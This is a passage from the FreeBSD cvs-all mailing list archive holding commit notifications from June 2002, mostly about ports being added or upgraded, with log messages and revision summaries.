Changes Path 1.10 +5 -2 ports/devel/py-kjbuckets/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:41:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A9C6137B40D; Mon, 17 Jun 2002 12:41:25 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJdY710831; Mon, 17 Jun 2002 12:39:34 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206171939.g5HJdY710831@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 12:39:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/science/mpqc Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 12:39:34 PDT Modified files: science/mpqc Makefile distinfo pkg-plist Log: upgrade to 2.1.1 unbreak Approved by: maintainer timeout Revision Changes Path 1.3 +9 -5 ports/science/mpqc/Makefile 1.2 +1 -1 ports/science/mpqc/distinfo 1.2 +69 -65 ports/science/mpqc/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:45:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F13D037B423; Mon, 17 Jun 2002 12:45:26 -0700 (PDT) Received: (from roberto@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJfof11555; Mon, 17 Jun 2002 12:41:50 -0700 (PDT) (envelope-from roberto) Message-Id: <200206171941.g5HJfof11555@freefall.freebsd.org> From: Ollivier Robert Date: Mon, 17 Jun 2002 12:41:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/translate Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG roberto 2002/06/17 12:41:50 PDT Added files: misc/translate Makefile distinfo pkg-comment pkg-descr pkg-plist Log: translate uses the Babelfish engine from Altavista to translate sentences in different languages. PR: ports/39242 Submitted by: Michael L. Hostbaek Revision Changes Path 1.1 +28 -0 ports/misc/translate/Makefile (new) 1.1 +1 -0 ports/misc/translate/distinfo (new) 1.1 +1 -0 ports/misc/translate/pkg-comment (new) 1.1 +8 -0 ports/misc/translate/pkg-descr (new) 1.1 +1 -0 ports/misc/translate/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:46:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4140F37B421; Mon, 17 Jun 2002 12:46:16 -0700 (PDT) Received: (from roberto@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJgk911689; Mon, 17 Jun 2002 12:42:46 -0700 (PDT) (envelope-from roberto) Message-Id: <200206171942.g5HJgk911689@freefall.freebsd.org> From: Ollivier Robert Date: Mon, 17 Jun 2002 12:42:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG roberto 2002/06/17 12:42:46 PDT Modified files: misc Makefile Log: Connect translate to the build. Revision Changes Path 1.456 +1 -0 ports/misc/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:47:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3009137B400; Mon, 17 Jun 2002 12:47:19 -0700 (PDT) Received: (from roberto@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJiC011839; Mon, 17 Jun 2002 12:44:12 -0700 (PDT) (envelope-from roberto) Message-Id: <200206171944.g5HJiC011839@freefall.freebsd.org> From: Ollivier Robert Date: Mon, 17 Jun 2002 12:44:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG roberto 2002/06/17 12:44:12 PDT Modified files: . modules Log: translate -> ports/misc/translate. Revision Changes Path 1.5373 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:59:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8954937B40A; Mon, 17 Jun 2002 12:59:41 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJsmT13425; Mon, 17 Jun 2002 12:54:48 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206171954.g5HJsmT13425@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 12:54:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 12:54:48 PDT Modified files: . modules Log: portfwd --> ports/net/portfwd Revision Changes Path 1.5374 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 12:59:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D67DC37B43B; Mon, 17 Jun 2002 12:59:40 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJskj13394; Mon, 17 Jun 2002 12:54:46 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206171954.g5HJskj13394@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 12:54:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net Makefile ports/net/portfwd Makefile distinfo pkg-comment pkg-descr pkg-plist ports/net/portfwd/files patch-Makefile.in patch-doc::Makefile.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 12:54:46 PDT Modified files: net Makefile Added files: net/portfwd Makefile distinfo pkg-comment pkg-descr pkg-plist net/portfwd/files patch-Makefile.in patch-doc::Makefile.in Log: add portfwd 0.24 A Port Forwarding Daemon PR: 37770 Submitted by: Alex Dupre Revision Changes Path 1.787 +1 -0 ports/net/Makefile 1.1 +35 -0 ports/net/portfwd/Makefile (new) 1.1 +1 -0 ports/net/portfwd/distinfo (new) 1.1 +11 -0 ports/net/portfwd/files/patch-Makefile.in (new) 1.1 +11 -0 ports/net/portfwd/files/patch-doc::Makefile.in (new) 1.1 +1 -0 ports/net/portfwd/pkg-comment (new) 1.1 +8 -0 ports/net/portfwd/pkg-descr (new) 1.1 +25 -0 ports/net/portfwd/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13: 2:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 60ED937B417; Mon, 17 Jun 2002 13:02:27 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJwMx13918; Mon, 17 Jun 2002 12:58:22 -0700 (PDT) (envelope-from pat) Message-Id: <200206171958.g5HJwMx13918@freefall.freebsd.org> From: Patrick Li Date: Mon, 17 Jun 2002 12:58:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/p5-XML-Stream Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/17 12:58:22 PDT Modified files: textproc/p5-XML-Stream Makefile distinfo pkg-plist Log: Update to 1.15 PR: 39403 Submitted by: maintainer Revision Changes Path 1.5 +2 -2 ports/textproc/p5-XML-Stream/Makefile 1.5 +1 -1 ports/textproc/p5-XML-Stream/distinfo 1.5 +1 -0 ports/textproc/p5-XML-Stream/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13: 3: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8FB3137B40B; Mon, 17 Jun 2002 13:02:58 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HJxSE14072; Mon, 17 Jun 2002 12:59:28 -0700 (PDT) (envelope-from pat) Message-Id: <200206171959.g5HJxSE14072@freefall.freebsd.org> From: Patrick Li Date: Mon, 17 Jun 2002 12:59:28 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/p5-Net-Jabber Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/17 12:59:28 PDT Modified files: net/p5-Net-Jabber Makefile distinfo Log: Update to 1.26 PR: 39404 Submitted by: maintainer Revision Changes Path 1.7 +1 -1 ports/net/p5-Net-Jabber/Makefile 1.5 +1 -1 ports/net/p5-Net-Jabber/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13: 9:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6906837B40E; Mon, 17 Jun 2002 13:09:19 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HK4Uw15578; Mon, 17 Jun 2002 13:04:30 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206172004.g5HK4Uw15578@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 13:04:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 13:04:30 PDT Modified files: . modules Log: p5-Crypt-PGPSimple --> ports/security/p5-Crypt-PGPSimple Revision Changes Path 1.5375 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:10: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4041D37B47B; Mon, 17 Jun 2002 13:09:23 -0700 (PDT) Received: (from tobez@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HK4d815616; Mon, 17 Jun 2002 13:04:39 -0700 (PDT) (envelope-from tobez) Message-Id: <200206172004.g5HK4d815616@freefall.freebsd.org> From: Anton Berezin Date: Mon, 17 Jun 2002 13:04:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/perl5 perl.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tobez 2002/06/17 13:04:39 PDT Modified files: (Branch: RELENG_4) contrib/perl5 perl.c Log: Merge from lang/perl5 port: Put SITEARCH and SITELIB paths in front of ARCHLIB and PRIVLIB in the @INC array. This takes care of the infamous problem of updating the packages already in the perl distribution. With this change, no tricks are any longer necessary for such p5 ports, except the usual tweaking of INSTALLDIRS in Makefile.PL. Approved by: markm Tested by: DougB PR: 23376, 32817, 39337 and maybe more Revision Changes Path 1.3.2.1 +12 -12 src/contrib/perl5/perl.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:14:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 27A8C37B477; Mon, 17 Jun 2002 13:14:42 -0700 (PDT) Received: (from n_hibma@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HK16d14968; Mon, 17 Jun 2002 13:01:06 -0700 (PDT) (envelope-from n_hibma) Message-Id: <200206172001.g5HK16d14968@freefall.freebsd.org> From: Nick Hibma Date: Mon, 17 Jun 2002 13:01:06 -0700 (PDT) To: cvs-committers@freebsd.org, cvs-all@freebsd.org Subject: cvs commit: src/sys/conf kmod.mk X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG n_hibma 2002/06/17 13:01:06 PDT Modified files: sys/conf kmod.mk Log: Use OBJDIR instead of CURDIR. This unbreaks loading modules through 'make load' if an object dir was, like it is used in /sys/modules. I.e. cd /sys/modules/umass make obj make make load works again without having to install the module. If no objdir was used the module in the current directory is used. Revision Changes Path 1.125 +1 -1 src/sys/conf/kmod.mk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:14:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8A9AC37B42B; Mon, 17 Jun 2002 13:14:43 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HK4RV15535; Mon, 17 Jun 2002 13:04:27 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206172004.g5HK4RV15535@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 13:04:27 -0700 (PDT) To: cvs-committers@freebsd.org, cvs-all@freebsd.org Subject: cvs commit: ports/security Makefile ports/security/p5-Crypt-PGPSimple Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 13:04:27 PDT Modified files: security Makefile Added files: security/p5-Crypt-PGPSimple Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add p5-Crypt-PGPSimple 0.13 Crypt::PGPSimple provides a simple object-oriented interface to PGP PR: 38622 Submitted by: rachek Revision Changes Path 1.303 +1 -0 ports/security/Makefile 1.1 +24 -0 ports/security/p5-Crypt-PGPSimple/Makefile (new) 1.1 +1 -0 ports/security/p5-Crypt-PGPSimple/distinfo (new) 1.1 +1 -0 ports/security/p5-Crypt-PGPSimple/pkg-comment (new) 1.1 +9 -0 ports/security/p5-Crypt-PGPSimple/pkg-descr (new) 1.1 +5 -0 ports/security/p5-Crypt-PGPSimple/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:16:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 20D0B37B407; Mon, 17 Jun 2002 13:16:51 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKDKA21059; Mon, 17 Jun 2002 13:13:20 -0700 (PDT) (envelope-from pat) Message-Id: <200206172013.g5HKDKA21059@freefall.freebsd.org> From: Patrick Li Date: Mon, 17 Jun 2002 13:13:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/resume Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/17 13:13:20 PDT Modified files: textproc/resume Makefile distinfo pkg-plist Log: Update to 1.4.1 PR: 39389 Submitted by: maintainer Revision Changes Path 1.4 +1 -1 ports/textproc/resume/Makefile 1.4 +1 -1 ports/textproc/resume/distinfo 1.5 +65 -43 ports/textproc/resume/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:21:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EEB2837B43A; Mon, 17 Jun 2002 13:20:50 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKKon22328; Mon, 17 Jun 2002 13:20:50 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206172020.g5HKKon22328@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 13:20:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/java/jakarta-oro Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 13:20:50 PDT Modified files: java/jakarta-oro Makefile Log: fix typo to install docs PR: 39112 Submitted by: maintainer Revision Changes Path 1.3 +3 -3 ports/java/jakarta-oro/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:26:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C81EC37B421; Mon, 17 Jun 2002 13:26:24 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKQO223012; Mon, 17 Jun 2002 13:26:24 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206172026.g5HKQO223012@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 13:26:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/audio/gnump3d Makefile distinfo ports/audio/gnump3d/files patch-freebsd patch-server.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 13:26:24 PDT Modified files: audio/gnump3d Makefile distinfo audio/gnump3d/files patch-freebsd Removed files: audio/gnump3d/files patch-server.c Log: upgrade to 0.9.9.9 PR: 39427 Submitted by: Ports Fury Revision Changes Path 1.4 +3 -2 ports/audio/gnump3d/Makefile 1.3 +1 -1 ports/audio/gnump3d/distinfo 1.4 +17 -10 ports/audio/gnump3d/files/patch-freebsd 1.3 +0 -10 ports/audio/gnump3d/files/patch-server.c (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:31:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 71D1F37B40D; Mon, 17 Jun 2002 13:31:18 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKVIm24066; Mon, 17 Jun 2002 13:31:18 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206172031.g5HKVIm24066@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 13:31:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/archivers/star Makefile distinfo ports/archivers/star/files patch-ab patch-ad X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 13:31:18 PDT Modified files: archivers/star Makefile distinfo archivers/star/files patch-ab patch-ad Log: upgrade to 1.4 PR: 39428 Submitted by: Ports Fury Revision Changes Path 1.28 +7 -9 ports/archivers/star/Makefile 1.6 +1 -1 ports/archivers/star/distinfo 1.3 +85 -24 ports/archivers/star/files/patch-ab 1.2 +5 -16 ports/archivers/star/files/patch-ad To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:34:34 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 09C2537B428; Mon, 17 Jun 2002 13:34:08 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKY8M24435; Mon, 17 Jun 2002 13:34:08 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206172034.g5HKY8M24435@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 13:34:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/hypersrc Makefile distinfo ports/devel/hypersrc/files patch-Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 13:34:07 PDT Modified files: devel/hypersrc Makefile distinfo devel/hypersrc/files patch-Makefile Log: upgrade to 5.2.8 PR: 39429 Submitted by: Ports Fury Revision Changes Path 1.5 +4 -3 ports/devel/hypersrc/Makefile 1.5 +1 -1 ports/devel/hypersrc/distinfo 1.4 +19 -20 ports/devel/hypersrc/files/patch-Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:36:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 442C637B40E; Mon, 17 Jun 2002 13:36:48 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKamM24882; Mon, 17 Jun 2002 13:36:48 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206172036.g5HKamM24882@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 13:36:48 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/jam Makefile distinfo ports/devel/jam/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 13:36:48 PDT Modified files: devel/jam Makefile distinfo Removed files: devel/jam/files patch-aa Log: upgrade to 2.4 PR: 39430 Submitted by: Ports Fury Revision Changes Path 1.9 +12 -6 ports/devel/jam/Makefile 1.3 +1 -1 ports/devel/jam/distinfo 1.3 +0 -22 ports/devel/jam/files/patch-aa (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:40:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 944E337B41F; Mon, 17 Jun 2002 13:40:04 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKe4O25303; Mon, 17 Jun 2002 13:40:04 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206172040.g5HKe4O25303@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 13:40:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/liboop Makefile pkg-plist ports/devel/liboop/files patch-configure X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 13:40:04 PDT Modified files: devel/liboop Makefile pkg-plist Removed files: devel/liboop/files patch-configure Log: GNU_CONFIGURE -> USE_LIBTOOL PR: 39431 Submitted by: Ports Fury Revision Changes Path 1.3 +10 -6 ports/devel/liboop/Makefile 1.3 +0 -11 ports/devel/liboop/files/patch-configure (dead) 1.3 +0 -6 ports/devel/liboop/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:42: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D8A9937B408; Mon, 17 Jun 2002 13:42:03 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKg3j25958; Mon, 17 Jun 2002 13:42:03 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206172042.g5HKg3j25958@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 13:42:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/games/an Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 13:42:03 PDT Modified files: games/an Makefile Log: Support CC/CFLAGS/MAKE properly PR: 39432 Submitted by: Ports Fury Revision Changes Path 1.5 +10 -3 ports/games/an/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 13:43: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2FCF737B416; Mon, 17 Jun 2002 13:42:56 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HKgun26100; Mon, 17 Jun 2002 13:42:56 -0700 (PDT) (envelope-from pat) Message-Id: <200206172042.g5HKgun26100@freefall.freebsd.org> From: Patrick Li Date: Mon, 17 Jun 2002 13:42:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/swftools Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/17 13:42:56 PDT Modified files: graphics/swftools Makefile distinfo Log: Update to 0.4.0 PR: 39434 Submitted by: KATO 